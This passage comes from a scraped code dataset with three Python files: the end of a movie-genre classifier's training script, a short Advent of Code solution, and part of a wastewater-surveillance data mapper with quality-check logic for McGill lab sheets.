model...')\n\n micro_begin = 0.0\n no_decay_epoch = 0\n\n logging.info('>>> begin training...')\n model_save = tempfile.TemporaryFile()\n for epoch in range(100):\n t_begin = time.time()\n t_log = t_begin\n train_loss = []\n for step, batch in enumerate(train_dataloader):\n model.train()\n optimizer.zero_grad()\n\n loss, accuracy, _, _, _ = model(batch)\n loss = loss.mean()\n accuracy = accuracy.mean()\n loss.backward()\n\n optimizer.step()\n if args.model_name == 'mymodel':\n schedual.step()\n\n train_loss.append(loss)\n\n elap_t = time.time() - t_begin\n if step == 2 or step and step % 10 == 0:\n lr = optimizer.param_groups[0]['lr']\n logging.info(f\"Epoch={epoch + 1}|step={step:4}/{len(train_dataloader)}|\"\n f\"loss={loss:6.4}|lr={lr:0.8}|acc={accuracy:0.4}|time={elap_t:.4}s\")\n t_begin = time.time()\n\n logging.info(f\"train_loss={sum(train_loss) / len(train_loss):.4}\")\n # validation\n logging.info('>>> begin validation...')\n val_loss, metrics, _ = validation(model, val_dataloader)\n logging.info(f\">>> val_loss: {val_loss}, matrics: {metrics}\")\n micro_f1 = metrics['micro_f1']\n\n if micro_f1 - micro_begin > 0.001:\n micro_begin = micro_f1\n no_decay_epoch = 0\n logging.info('>> model saving...')\n model_save.close()\n model_save = tempfile.TemporaryFile()\n dict_list = [model.module.state_dict()] #\n torch.save(dict_list, model_save)\n note_log['best_epoch'][i] = epoch\n else:\n no_decay_epoch += 1\n if no_decay_epoch >= args.early_stop_epoch:\n logging.info('the micro_f1 is not increase over %d epoches, STOP Training!' % args.early_stop_epoch)\n break\n\n # 开始test\n logging.info('==========================================================')\n logging.info('>>> begin testing...')\n metrics = test_model(args, test_dataloader, model_save, dataloader)\n note_log['macro'].append(metrics['macro_f1'])\n note_log['micro'].append(metrics['micro_f1'])\n note_log['weighted_f1'].append(metrics['weighted_f1'])\n note_log['auc_pr_macro'].append(metrics['auc_pr_macro'])\n note_log['auc_pr_micro'].append(metrics['auc_pr_micro'])\n note_log['auc_macro'].append(metrics['auc_macro'])\n note_log['auc_micro'].append(metrics['auc_micro'])\n\n result = 'macro: %.4f|micro: %.4f|weighted: %.4f|auc_pr_macro:%.4f|auc_pr_micro:%.4f|auc_macro:%.4f|auc_micro:%.4f' % \\\n (np.array(note_log['macro']).mean(),\n np.array(note_log['micro']).mean(),\n np.array(note_log['weighted_f1']).mean(),\n np.array(note_log['auc_pr_macro']).mean(),\n np.array(note_log['auc_pr_micro']).mean(),\n np.array(note_log['auc_macro']).mean(),\n np.array(note_log['auc_micro']).mean())\n # 保存日志\n if args.dataset_name == 'moviebricks':\n result_save_path = './moviebricks.json'\n else:\n result_save_path = './moviescope.json'\n with open(result_save_path, 'a+', encoding='utf-8') as f:\n json.dump(note_log, f)\n f.write('\\n')\n f.write(result)\n f.write('\\n')\n print('======result=====', result)\n\n\ndef rewrite_args(args, root):\n args.annotation = root + args.annotation\n args.graph_path = root + args.graph_path\n args.pic_video_path = root + args.pic_video_path\n args.poster_pic_path = root + args.poster_pic_path\n args.audio_feature_path = root + args.audio_feature_path\n args.label_path = root + args.label_path\n args.poster_feature_path = root + args.poster_feature_path\n args.word2vec_path = root + args.word2vec_path\n\n\nif __name__ == '__main__':\n args = parse_args()\n if args.dataset_name == 'moviebricks':\n root = './data/'\n elif args.dataset_name == 'moviescope':\n root = './data-moviescope/'\n else:\n root = ''\n setup_seed(args)\n setup_device(args)\n setup_logging(args.model_name + '_' + args.ablation)\n logging.info(\"Training/evaluation parameters: %s\", args)\n rewrite_args(args, root)\n\n if root == './data/':\n cls_freqs = {'动作': 744, '惊悚': 861, '冒险': 579, '剧情': 2244, '科幻': 403, '爱情': 591, '奇幻': 337, '喜剧': 1189, '恐怖': 414, '犯罪': 496}\n movie_num = 4063\n cls_weight = torch.FloatTensor([int(v) / movie_num for v in cls_freqs.values()]) ** -1\n else:\n cls_freqs = [953, 200, 237, 1556, 731, 2114, 461, 760, 451, 415, 910, 494, 1181]\n movie_num = 4076\n cls_weight = torch.FloatTensor([int(v) / movie_num for v in cls_freqs]) ** -1\n args.cls_num = len(cls_freqs)\n args.bert_dir = 'roberta-base'\n args.pretrain_model_lr = 5e-6\n args.warmup_steps = 200 # 6000\n args.bert_cache = './models/cache/bert'\n args.word2vec_path = './data-moviescope/word2vec/GoogleNews-vectors-negative300.bin.gz'\n\n print(cls_weight)\n args.cls_weight = cls_weight\n \n train_and_validation(args)\n","repo_name":"lucyyangrui/MFMGC","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24392348290","text":"import sys\n\njoltages = [0]\nwith open(sys.argv[1]) as file:\n for line in file:\n joltages.append(int(line))\njoltages.append(max(joltages) + 3)\n\njoltages.sort()\ndifferences = list(map(lambda a, b: b-a, joltages[:-1], joltages[1:]))\nprint(differences.count(1) * differences.count(3))\n","repo_name":"snaily/adventofcode2020","sub_path":"10a.py","file_name":"10a.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16380242393","text":"import os\nimport re\nimport warnings\nfrom datetime import datetime\nfrom typing import Literal\n\nimport numpy as np\nimport pandas as pd\n\nfrom wbe_odm import utilities\nfrom wbe_odm.odm_mappers import excel_template_mapper\nfrom wbe_odm.odm_mappers.csv_mapper import CsvMapper\n\nLABEL_REGEX = r\"[a-zA-Z]+_[0-9]+(\\.[0-9])?_[a-zA-Z0-9]+_[a-zA-Z0-9]+\"\n\ndirectory = os.path.dirname(__file__)\n\nMCGILL_MAP_2021 = f\"{directory}/mcgill_map.csv\"\nMCGILL_MAP_2022 = f\"{directory}/mcgill_map_2022.csv\"\n\nLETTERS = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n\nclass MapperFuncs:\n @classmethod\n def parse_date(cls, item, format=\"%Y-%m-%d\"):\n date = pd.NaT\n try:\n date = pd.to_datetime(item, format=format)\n except TypeError:\n return date\n\n @classmethod\n def clean_up(cls, df, molecular_cols, meas_cols, date_format):\n # removed rows that aren't samples\n type_col = \"sampling.general information.type sample.na\"\n df = df.loc[~df[type_col].isin([\"Reference\", \"Negative\"])]\n\n df.loc[:, molecular_cols + meas_cols] = df.loc[\n :, molecular_cols + meas_cols\n ].apply(pd.to_numeric, errors=\"coerce\")\n\n df = df.dropna(subset=molecular_cols, how=\"all\")\n # Parse other measurement columns:\n # we need to convert resistivity to conductivity\n cond_col = \"concentration.key parametres.conductivity megohm.na\"\n df[cond_col] = df[cond_col].apply(\n lambda x: 1 / x if str(x).isnumeric else np.nan\n )\n # Parse date columns to datetime\n for col in df.columns:\n if \"date\" in col:\n df[col] = df[col].apply(lambda x: cls.parse_date(x, date_format))\n return df\n\n @classmethod\n def clean_labels(cls, label):\n parts = str(label).lower().split(\"_\")\n parts = [part.strip() for part in parts]\n return \"_\".join(parts)\n\n @classmethod\n def get_sample_type(cls, sample_type):\n \"\"\"acceptable_types = [\n \"qtips\", \"filter\", \"gauze\",\n \"swrsed\", \"pstgrit\", \"psludge\",\n \"pefflu\", \"ssludge\", \"sefflu\",\n \"water\", \"faeces\", \"rawww\", \"\"\n ]\"\"\"\n sample_type = sample_type.str.strip().str.lower()\n return sample_type\n\n @classmethod\n def get_start_date(cls, start_col, end_col, sample_type):\n df = pd.concat([start_col, end_col, sample_type], axis=1)\n df.columns = [\"start\", \"end\", \"type\"]\n df[\"s\"] = df.apply(\n lambda row: utilities.calc_start_date(row[\"end\"], row[\"type\"]), axis=1\n )\n return df[\"s\"]\n\n @classmethod\n def get_grab_date(cls, end_series, type_series):\n df = pd.concat([end_series, type_series], axis=1)\n df.columns = [\"end\", \"type\"]\n df[\"date_grab\"] = pd.NaT\n filt = df[\"type\"].str.contains(\"grb\")\n df.loc[filt, \"date_grab\"] = df.loc[filt, \"end\"]\n return df[\"date_grab\"]\n\n @classmethod\n def get_collection_method(cls, collection):\n def check_collection_method(x):\n if (\n re.match(r\"cp[tf]p[0-9]+h\", x)\n or x == \"grb\"\n or re.match(r\"ps[0-9]+h\", x)\n ):\n return x\n elif \"grb\" in collection:\n added_bit = collection[len(\"grb\") :]\n return \"grb\" + \"cp\" + added_bit\n else:\n return \"\"\n\n collection = collection.str.strip()\n collection = collection.apply(lambda x: check_collection_method(x))\n return collection\n\n @classmethod\n def get_assay_method_id(cls, sample_type, concentration_method, assay_date):\n formatted_date = CsvMapper.str_date_from_timestamp(assay_date)\n clean_series = []\n for series in [sample_type, concentration_method, formatted_date]:\n series = series.fillna(\"\").astype(str)\n clean_series.append(series)\n df = pd.concat(clean_series, axis=1)\n return df.agg(\"_\".join, axis=1)\n\n @classmethod\n def get_assay_instrument(cls, static_methods, sample_type, concentration_method):\n clean_series = []\n for series in [sample_type, concentration_method]:\n series = series.fillna(\"\").astype(str)\n clean_series.append(series)\n df = pd.concat(clean_series, axis=1)\n df[\"general_id\"] = df.agg(\"_\".join, axis=1).str.lower()\n merged = pd.merge(\n left=static_methods,\n right=df,\n left_on=\"assayMethodID\",\n right_on=\"general_id\",\n )\n return merged[\"instrumentID\"].fillna(\"\")\n\n @classmethod\n def get_assay_name(cls, static_methods, sample_type, concentration_method):\n clean_series = []\n for series in [sample_type, concentration_method]:\n series = series.fillna(\"\").astype(str)\n clean_series.append(series)\n df = pd.concat(clean_series, axis=1)\n df[\"general_id\"] = df.agg(\"_\".join, axis=1).str.lower()\n merged = pd.merge(\n left=static_methods,\n right=df,\n left_on=\"assayMethodID\",\n right_on=\"general_id\",\n )\n return merged[\"name\"].fillna(\"\")\n\n @classmethod\n def write_concentration_method(cls, conc_method, conc_volume, ph_final):\n clean_series = []\n names = [\"conc\", \"conc_volume\", \"ph_final\"]\n for series, name in zip([conc_method, conc_volume, ph_final], names):\n series = series.fillna(\"unknown\").astype(str)\n series.name = name\n clean_series.append(series)\n df = pd.concat(clean_series, axis=1)\n\n df[\"text\"] = df.apply(\n lambda row: f\"{row['conc']}, Volume:{row['conc_volume']} mL, Final pH:{row['ph_final']}\", # noqa\n axis=1,\n )\n return df[\"text\"]\n\n @classmethod\n def get_site_id(cls, labels):\n def extract_from_label(label_id):\n if re.match(LABEL_REGEX, label_id):\n label_parts = label_id.split(\"_\")\n return \"_\".join(label_parts[:2])\n else:\n return \"\"\n\n clean_label_series = labels.apply(lambda x: cls.clean_labels(x))\n return clean_label_series.apply(lambda x: extract_from_label(x))\n\n @classmethod\n def sample_is_pooled(cls, pooled):\n # It isn't clear what the sheet wants the user to do - either say \"Yes\"\n # if the sample is pooled, or actually put in the sample ids\n # of the children. For now, let's only check if it is pooled or not\n return pooled != \"\"\n\n @classmethod\n def get_children_samples(cls, pooled, sample_date):\n def make_children_ids(row):\n split_pooled = row[\"pooled\"].split(\",\") if \",\" in pooled else \"\"\n children_ids = [\n \"_\".join([item, row[\"clean_date\"]])\n for item in split_pooled\n if re.match(LABEL_REGEX, item)\n ]\n return \",\".join(children_ids) if children_ids else \"\"\n\n clean_date = CsvMapper.str_date_from_timestamp(sample_date)\n df = pd.concat([pooled, clean_date], axis=1)\n df.columns = [\"pooled\", \"clean_date\"]\n df[\"children_ids\"] = df.apply(lambda row: make_children_ids(row))\n return df[\"children_ids\"]\n\n @classmethod\n def get_sample_id(cls, label_id, sample_date, spike_batch, lab_id, sample_index):\n # TODO: Deal with index once it's been implemented in McGill sheet\n clean_date = CsvMapper.str_date_from_timestamp(sample_date)\n clean_label = label_id.apply(lambda x: cls.clean_labels(x))\n\n df = pd.concat([clean_label, clean_date, spike_batch], axis=1)\n df[\"lab_id\"] = lab_id\n df[\"index_no\"] = (\n sample_index.astype(str)\n if isinstance(sample_index, pd.Series)\n else str(sample_index)\n )\n\n df.columns = [\"clean_label\", \"clean_date\", \"spike_batch\", \"lab_id\", \"index_no\"]\n df[\"sample_ids\"] = \"\"\n regex_filt = df[\"clean_label\"].str.match(LABEL_REGEX, case=False)\n\n df.loc[regex_filt, \"sample_ids\"] = df.loc[\n regex_filt, [\"clean_label\", \"clean_date\", \"index_no\"]\n ].agg(\"_\".join, axis=1)\n\n df.loc[~regex_filt, \"sample_ids\"] = df.loc[\n ~regex_filt, [\"lab_id\", \"spike_batch\", \"clean_label\", \"index_no\"]\n ].agg(\"_\".join, axis=1)\n return df[\"sample_ids\"]\n\n @classmethod\n def get_wwmeasure_id(\n cls,\n label_id,\n sample_date,\n spike_batch,\n lab_id,\n sample_index,\n meas_type,\n meas_date,\n index,\n ):\n # TODO: Deal with index once it's been implemented in McGill sheet\n sample_id = cls.get_sample_id(\n label_id, sample_date, spike_batch, lab_id, sample_index\n )\n meas_date = CsvMapper.str_date_from_timestamp(meas_date)\n df = pd.concat([sample_id, meas_date], axis=1)\n df[\"meas_type\"] = meas_type\n df[\"index_no\"] = (\n index.astype(str) if isinstance(index, pd.Series) else str(index)\n )\n\n return df.agg(\"_\".join, axis=1)\n\n @classmethod\n def get_reporter_id(cls, static_reporters, name):\n def get_reporter_name(x):\n reporters_w_name = static_reporters.loc[\n static_reporters[\"reporterID\"].str.lower().str.contains(x)\n ]\n if len(reporters_w_name) > 0:\n return reporters_w_name.iloc[0][\"reporterID\"]\n else:\n return x\n\n name = name.str.replace(\", \", \"/\").str.replace(\",\", \"/\").str.replace(\";\", \"/\")\n name = name.str.lower().apply(lambda x: x.split(\"/\")[0] if \"/\" in x else x)\n name = name.str.strip()\n reporters_ids = name.apply(get_reporter_name)\n return reporters_ids\n\n @classmethod\n def has_quality_flag(cls, flag):\n negative_flags = [\"\", \"0\", \"no\", \"n\", \"f\", \"false\", \"none\", \"nan\"]\n return ~flag.astype(str).str.lower().isin(negative_flags)\n\n @classmethod\n def get_sample_volume(cls, vols, default):\n vols = vols.apply(lambda x: default if pd.isna(x) else x)\n return vols\n\n @classmethod\n def get_field_sample_temp(cls, series):\n temp_map = {\n \"refrigerated\": 4.0,\n \"ice\": 0.0,\n \"norefrigaration\": 20.0,\n # \"norefrigeration\": np.nan\n }\n series = series.str.lower().map(temp_map)\n return series\n\n @classmethod\n def get_shipped_on_ice(cls, series):\n series = series.str.lower()\n map_to = {\"yes\": True, \"no\": False}\n return series.map(map_to)\n\n @classmethod\n def grant_access(cls, access):\n return access.str.lower().isin([\"\", \"1\", \"yes\", \"true\"])\n\n @classmethod\n def validate_fraction_analyzed(cls, series):\n filt = (\n series.str.contains(\"mixed\")\n | series.str.contains(\"liquid\")\n | series.str.contains(\"solids\")\n )\n series.loc[~filt] = \"\"\n return series\n\n @classmethod\n def validate_value(cls, values):\n return pd.to_numeric(values, errors=\"coerce\")\n\n @classmethod\n def get_lab_id(cls, lab_id):\n if isinstance(lab_id, str):\n return lab_id.lower().strip()\n elif isinstance(lab_id, pd.Series):\n return lab_id.str.lower().strip()\n raise TypeError(f\"What is this lab_id?: {lab_id}\")\n\n\ndef append_new_entry(new_entry, current_table_data):\n if current_table_data is None:\n new_entry = {0: new_entry}\n return pd.DataFrame.from_dict(new_entry, orient=\"index\")\n new_index = current_table_data.index.max() + 1\n current_table_data.loc[new_index] = new_entry\n return current_table_data\n\n\ndef get_lod(lab, label_col_name, spike_col_name, lod_value_col):\n new_cols = [\"LOD\"]\n filt = lab[label_col_name] == \"negative\"\n cols_to_keep = [\n label_col_name,\n spike_col_name,\n lod_value_col,\n ]\n lod_df = lab.loc[filt][cols_to_keep]\n for col in new_cols:\n lab.loc[:, col] = np.nan\n lod_df[spike_col_name] = lod_df[spike_col_name].replace(\"\", np.nan)\n lod_df = lod_df.dropna(subset=[spike_col_name])\n spike_ids = list(lod_df[spike_col_name].dropna().unique())\n for spike_id in spike_ids:\n lod_filt = lod_df[spike_col_name] == spike_id\n lab_filt = lab[spike_col_name] == spike_id\n lod = lod_df.loc[lod_filt].iloc[0].loc[lod_value_col]\n for col in new_cols:\n lab.loc[lab_filt, col] = lod\n return lab\n\n\ndef get_loq(lab):\n lab[\"LOQ\"] = np.nan\n return lab\n\n\ndef validate_date_text(date_text):\n date_text = str(date_text)\n try:\n if date_text != datetime.strptime(date_text, \"%Y-%m-%d\").strftime(\"%Y-%m-%d\"):\n raise ValueError\n return True\n except ValueError:\n return False\n\n\ndef remove_bad_rows(lab):\n \"\"\" \"LabelID column should contain something for all valid rows.\n If it's something else than an empty value and that this empty value\n doesn't cast to datetime, the row should be deleted\"\"\"\n LABEL_ID_COL = \"D\"\n filt1 = ~pd.isnull(lab[LABEL_ID_COL])\n filt2 = ~lab[LABEL_ID_COL].str.lower().str.contains(\"reference\").astype(bool)\n filt3 = ~lab[LABEL_ID_COL].str.lower().str.contains(\"negative\").astype(bool)\n return lab.loc[filt1 & filt2 & filt3]\n\n\ndef get_labsheet_inputs(map_row, lab_data, lab_id):\n lab_input = map_row[\"labInputs\"]\n if lab_input == \"\":\n return None\n var_name = map_row[\"variableName\"]\n raw_inputs = lab_input.split(\";\")\n final_inputs = []\n for input_ in raw_inputs:\n if re.match(r\"__const__.*:.*\", input_):\n value, type_ = input_[len(\"__const__\") :].split(\":\")\n if type_ == \"str\":\n value = str(value)\n elif type_ == \"int\":\n value = int(value)\n elif input_ == \"__labID__\":\n value = lab_id\n elif input_ == \"__varName__\":\n value = var_name\n elif input_ == \"__default__\":\n value = map_row[\"defaultValue\"]\n else:\n value = lab_data[input_]\n final_inputs.append(value)\n return tuple(final_inputs)\n\n\ndef get_static_inputs(map_row, static_data):\n input_sources = map_row[\"inputSources\"]\n if \"static\" in input_sources:\n static_table = input_sources.split(\"+\")[0]\n static_table = static_table[len(\"static \") :]\n return static_data[static_table]\n else:\n return None\n\n\ndef get_all_inputs(row):\n static_input = row[\"static\"]\n lab_inputs = row[\"lab_arguments\"]\n if static_input is None and lab_inputs is None:\n inputs = None\n elif static_input is None:\n inputs = lab_inputs\n else:\n inputs = (static_input, *lab_inputs)\n if inputs is None:\n inputs = (row[\"defaultValue\"],)\n return inputs\n\n\ndef parse_sheet(\n mapping,\n static,\n lab_data,\n processing_functions,\n lab_id,\n):\n mapping[\"lab_arguments\"] = mapping.apply(\n lambda row: get_labsheet_inputs(row, lab_data, lab_id), axis=1\n )\n mapping[\"static\"] = mapping.apply(\n lambda row: get_static_inputs(row, static), axis=1\n )\n mapping[\"final_inputs\"] = mapping.apply(lambda row: get_all_inputs(row), axis=1)\n mapping[\"func\"] = mapping[\"processingFunction\"].apply(\n lambda x: processing_functions.get(x, CsvMapper.pass_raw)\n )\n\n mapping[\"columnName\"] = mapping[[\"table\", \"elementName\", \"variableName\"]].agg(\n \"_\".join, axis=1\n )\n to_apply = mapping.loc[:, [\"columnName\", \"func\", \"final_inputs\"]]\n for _, apply_row in to_apply.iterrows():\n col_name = apply_row[\"columnName\"]\n lab_data[col_name] = apply_row[\"func\"](*apply_row[\"final_inputs\"])\n tables = {table: pd.DataFrame() for table in mapping[\"table\"].unique()}\n for table in tables:\n elements = mapping.loc[mapping[\"table\"] == table, \"elementName\"].unique()\n sub_dfs = []\n for element in elements:\n table_element_filt = (mapping[\"table\"] == table) & (\n mapping[\"elementName\"] == element\n )\n col_names = mapping.loc[table_element_filt, \"columnName\"]\n var_names = mapping.loc[table_element_filt, \"variableName\"]\n sub_df = lab_data[col_names]\n sub_df.columns = var_names\n sub_dfs.append(sub_df)\n table_df = pd.concat(sub_dfs, axis=0, ignore_index=True)\n if table in [\"WWMeasure\", \"SiteMeasure\"]:\n table_df = table_df.dropna(subset=[\"value\"])\n tables[table] = table_df\n return tables\n\n\nclass QcChecker:\n def __init__(self, version: Literal[2021, 2022], date_check: bool):\n self.version = version\n self.date_check = date_check\n\n def _find_df_borders(self, sheet_cols, idx_col_pos):\n pos_of_cols_w_headers = []\n for i, col in enumerate(sheet_cols):\n if i == idx_col_pos:\n continue\n if \"Unnamed\" not in col:\n pos_of_cols_w_headers.append(i + 1)\n last_sheet_col = len(sheet_cols)\n pos_of_cols_w_headers.append(last_sheet_col)\n\n xl_start_cols = []\n xl_end_cols = []\n\n pos_of_last_item = len(pos_of_cols_w_headers) - 1\n for i in range(len(pos_of_cols_w_headers.copy())):\n if i == pos_of_last_item:\n # This is the end of the last df, so stop\n break\n\n start_pos = pos_of_cols_w_headers[i]\n\n if i == pos_of_last_item - 1:\n end_pos = pos_of_cols_w_headers[i + 1]\n\n else:\n end_pos = pos_of_cols_w_headers[i + 1] - 1\n\n start_idx = CsvMapper.excel_style(start_pos + 1)\n end_idx = CsvMapper.excel_style(end_pos + 1)\n xl_start_cols.append(start_idx)\n xl_end_cols.append(end_idx)\n return xl_start_cols, xl_end_cols\n\n def _get_type_codes(self, sheet_df):\n return sheet_df.iloc[1].dropna().to_list()\n\n def _get_sample_collection(self, type_codes):\n return [str(x).lower() for x in type_codes[::3]]\n\n def _get_last_dates(self, sheet_df):\n dates = sheet_df.iloc[2].dropna().to_list()\n temp_dates = []\n for item in dates:\n item = pd.to_datetime(item, errors=\"raise\", infer_datetime_format=True)\n temp_dates.append(item)\n return temp_dates\n\n def _get_label_ids(self, type_codes):\n return type_codes[2::3]\n\n def _get_site_ids(self, label_ids):\n sites = []\n for item in label_ids:\n split = item.split(\"_\")[:2]\n site = \"_\".join(split).lower()\n sites.append(site)\n return sites\n\n def _get_values_df(self, path, sheet_name, start, end, header_row_pos):\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"ignore\")\n return pd.read_excel(\n path,\n sheet_name=sheet_name,\n header=header_row_pos,\n usecols=f\"{start}:{end}\",\n )\n\n def _get_index_series(\n self, path: str, sheet_name: str, idx_col: str, header_row_pos: int\n ):\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"ignore\")\n idx_series = pd.read_excel(\n path,\n sheet_name=sheet_name,\n header=header_row_pos,\n usecols=idx_col,\n squeeze=True,\n ) # type:ignore\n return pd.to_datetime(idx_series, infer_datetime_format=True)\n\n def _clean_names(self, df):\n rejected_col_template = \"Rejected by\"\n cols = df.columns\n renamed_cols = {}\n incrementer = 0\n for col in cols:\n new_col = col\n if \"rejected\" in col.lower():\n new_col = (\n f\"{rejected_col_template}.{incrementer}\"\n if incrementer\n else rejected_col_template\n )\n incrementer += 1\n elif re.match(r\".*\\.[0-9]\", col):\n dot_idx = col.find(\".\")\n new_col = col[:dot_idx]\n\n renamed_cols[col] = new_col\n return df.rename(columns=renamed_cols)\n\n def _patch_pmmv_names(self, df):\n bad_name = \"PMMoV (gc/ml)\"\n correct_name = \"PMMV (gc/ml)\"\n if bad_name in df.columns:\n df = df.rename(columns={bad_name: correct_name})\n return df\n\n def _extract_dfs(self, path, sheet_name, idx_col_pos=0, header_row_pos=4):\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"ignore\")\n sheet_df = pd.read_excel(path, sheet_name=sheet_name, header=0, index_col=0)\n sheet_cols = [str(col) for col in sheet_df.columns]\n start_borders, end_borders = self._find_df_borders(sheet_cols, idx_col_pos)\n idx_col = CsvMapper.excel_style(idx_col_pos + 1)\n\n dfs = []\n if self.version == 2021:\n cols_to_keep = [\n \"BRSV (%rec)\",\n \"Rejected by\",\n \"PMMV (gc/ml)\",\n \"Rejected by.1\",\n \"SARS (gc/ml)\",\n \"Rejected by.2\",\n \"Quality Note\",\n ]\n elif self.version == 2022:\n cols_to_keep = [\n \"BRSV (%rec)\",\n \"Quality_flag_BRSV\",\n \"PMMV (gc/ml)\",\n \"Quality_flag_PMMoV\",\n \"SARS_N1 (gc/ml)\",\n \"Quality_flag_SARS_N1\",\n \"SARS_N2 (gc/ml)\",\n \"Quality_flag_SARS_N2\",\n \"Quality_flags_explication\",\n ]\n else:\n raise ValueError(f\"Version {self.version} not supported\")\n for start, end in zip(start_borders, end_borders):\n vals = self._get_values_df(path, sheet_name, start, end, header_row_pos)\n idx = self._get_index_series(path, sheet_name, idx_col, header_row_pos)\n df = vals.set_index(idx)\n df = self._clean_names(df)\n df = self._patch_pmmv_names(df)\n df = df.loc[:, cols_to_keep]\n df = df.dropna(how=\"all\")\n df.fillna(\"\", inplace=True)\n dfs.append(df)\n return sheet_df, dfs\n\n def _parse_dates(self, df):\n for col in df.columns:\n if \"dateTime\" in col:\n df[col] = pd.to_datetime(df[col], infer_datetime_format=True)\n return df\n\n def _validation_has_started(self, last_date):\n # If there is no 'last checked date', then validation isn't happening at this site, but the data shouldn't be removed\n return not pd.isna(pd.to_datetime(last_date, infer_datetime_format=True))\n\n def _apply_quality_checks(\n self, mapper, v_df, last_date, site_id, sample_collection\n ):\n if self.version == 2021:\n charac = {\n \"BRSV (%rec)\": {\n \"rejected_col\": \"Rejected by\",\n \"unit\": \"pctrecovery\",\n \"type\": \"brsv\",\n },\n \"PMMV (gc/ml)\": {\n \"rejected_col\": \"Rejected by.1\",\n \"unit\": \"gcml\",\n \"type\": \"pmmov\",\n },\n \"SARS (gc/ml)\": {\n \"rejected_col\": \"Rejected by.2\",\n \"unit\": \"gcml\",\n \"type\": \"covn1\",\n },\n }\n elif self.version == 2022:\n charac = {\n \"BRSV (%rec)\": {\n \"rejected_col\": \"Quality_flag_BRSV\",\n \"unit\": \"pctrecovery\",\n \"type\": \"brsv\",\n },\n \"PMMV (gc/ml)\": {\n \"rejected_col\": \"Quality_flag_PMMoV\",\n \"unit\": \"gcml\",\n \"type\": \"pmmov\",\n },\n \"SARS_N1 (gc/ml)\": {\n \"rejected_col\": \"Quality_flag_SARS_N1\",\n \"unit\": \"gcml\",\n \"type\": \"covn1\",\n },\n \"SARS_N2 (gc/ml)\": {\n \"rejected_col\": \"Quality_flag_SARS_N2\",\n \"unit\": \"gcml\",\n \"type\": \"covn2\",\n },\n }\n else:\n raise ValueError(f\"Version {self.version} not supported\")\n\n samples = mapper.sample.copy()\n samples = self._parse_dates(samples)\n ww = mapper.ww_measure.copy()\n\n quality_note_col = (\n \"Quality Note\" if self.version == 2021 else \"Quality_flags_explication\"\n )\n sample_collection_filt = (\n samples[\"collection\"].str.lower().str.contains(sample_collection)\n )\n sample_sites_filt = samples[\"siteID\"].str.lower().str.contains(site_id)\n for _, row in v_df.iterrows():\n sample_date_filt1 = (\n samples[\"dateTimeEnd\"].dt.date\n == pd.to_datetime(row.name, infer_datetime_format=True).date()\n )\n sample_date_filt2 = (\n samples[\"dateTime\"].dt.date\n == pd.to_datetime(row.name, infer_datetime_format=True).date()\n )\n sample_date_filt = sample_date_filt1 | sample_date_filt2\n sample_tot_filt = (\n sample_date_filt & sample_sites_filt & sample_collection_filt\n )\n\n samples.loc[sample_tot_filt, [\"qualityFlag\", \"notes\"]] = [\n True,\n row[quality_note_col],\n ]\n\n sample_list = (\n samples.loc[sample_tot_filt, \"sampleID\"].drop_duplicates().to_list()\n )\n\n for wwm_info in charac.values():\n if row[wwm_info[\"rejected_col\"]]:\n # print(\"Applying flag for \", row.name, col, row[wwm_info[\"rejected_col\"]])\n ww_type_filt = ww[\"type\"].str.lower().str.contains(wwm_info[\"type\"])\n ww_unit_filt = ww[\"unit\"].str.lower().str.contains(wwm_info[\"unit\"])\n ww_sample_filt = ww[\"sampleID\"].isin(sample_list)\n ww_tot_filt = ww_type_filt & ww_unit_filt & ww_sample_filt\n\n ww.loc[ww_tot_filt, [\"qualityFlag\", \"notes\"]] = [\n True,\n row[quality_note_col],\n ]\n\n if \"grb\" in sample_collection:\n sample_last_date_filt = samples[\"dateTime\"] > last_date\n else:\n sample_last_date_filt = samples[\"dateTimeEnd\"] > last_date\n\n if self.date_check:\n unchecked_filt = (\n sample_collection_filt & sample_sites_filt & sample_last_date_filt\n )\n samples.loc[unchecked_filt, [\"qualityFlag\", \"notes\"]] = [\n True,\n \"Unchecked viral measurements\",\n ]\n\n unchecked_sample_ids = (\n samples.loc[unchecked_filt, \"sampleID\"].drop_duplicates().to_list()\n )\n\n ww_u_type_filt = (\n ww[\"type\"].str.lower().isin([x[\"type\"] for x in charac.values()])\n )\n ww_u_sample_filt = ww[\"sampleID\"].isin(unchecked_sample_ids)\n ww.loc[ww_u_type_filt & ww_u_sample_filt, [\"qualityFlag\", \"notes\"]] = [\n True,\n \"Unchecked viral measurement\",\n ]\n\n mapper.sample = samples\n mapper.ww_measure = ww\n return mapper\n\n def read_validation(self, mapper, path, sheet_name):\n sheet_df, dfs = self._extract_dfs(path, sheet_name)\n\n last_dates = self._get_last_dates(sheet_df)\n\n type_codes = self._get_type_codes(sheet_df)\n sample_collections = self._get_sample_collection(type_codes)\n label_ids = self._get_label_ids(type_codes)\n site_ids = self._get_site_ids(label_ids)\n\n for v_df, last_date, site_id, sample_type in zip(\n dfs, last_dates, site_ids, sample_collections\n ):\n if not self._validation_has_started(last_date):\n continue\n mapper = self._apply_quality_checks(\n mapper, v_df, last_date, site_id, sample_type\n )\n return mapper\n\n\nclass McGillMapper(CsvMapper):\n def __init__(self, version: Literal[2021, 2022], processing_functions=MapperFuncs):\n self.version = version\n super().__init__(processing_functions=processing_functions)\n\n def get_attr_from_table_name(self, table_name: str) -> str:\n result = None\n for attr, dico in self.conversion_dict.items():\n odm_name = dico[\"odm_name\"]\n if odm_name == table_name:\n result = attr\n break\n if result is None:\n raise ValueError(f\"Could not find attribute for table {table_name}\")\n return result\n\n def read_static_data(self, staticdata_path):\n # Get the static data\n static_tables = [\n \"Lab\",\n \"Reporter\",\n \"Site\",\n \"Instrument\",\n \"Polygon\",\n \"AssayMethod\",\n ]\n attrs = []\n for table in static_tables:\n attr = self.get_attr_from_table_name(table)\n if attr is None:\n raise ValueError(f\"Could not find attribute for table {table}\")\n attrs.append(attr)\n static_data = {}\n excel_mapper = excel_template_mapper.ExcelTemplateMapper()\n if staticdata_path is not None:\n excel_mapper.read(staticdata_path, sheet_names=static_tables)\n for table, attr in zip(static_tables, attrs):\n static_data[table] = getattr(excel_mapper, attr)\n 